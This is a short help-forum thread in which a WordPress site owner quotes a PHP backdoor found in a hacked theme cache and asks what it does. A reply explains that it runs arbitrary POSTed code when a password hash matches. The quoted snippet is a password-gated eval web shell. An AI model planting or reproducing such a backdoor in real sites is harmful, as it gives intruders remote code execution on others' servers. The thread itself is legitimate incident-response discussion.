Decrypt Malicious inserterted PHP

I had a client's WordPress website hacked last week because of a leaky thumb.php. Cleaned up the website and replaced the leaky thumb.php. A PHP file was added to the theme's cached:
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));

Open in new window

I need someone to explain this code to me, Did find: but no precise explanation was given

PS The malicious code consequently added to a WP core file I have not added here
Who is Participating?

Improve company productivity with a Business Account.Sign Up

Jason C. LevineConnect With a Mentor No oneCommented:
If a specially crafted post is sent to the site with a variable of "key" defined, line 1 evaluates and turns into a command that lines 2 and 3 execute.  

I assume it does something less than optimal :)
rhandalthorAuthor Commented:
Yeah. Hadn't worked with $_POST for a while and certainly not this way. Well, think all is cleaned up and fortified again.. Thanks Jason.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.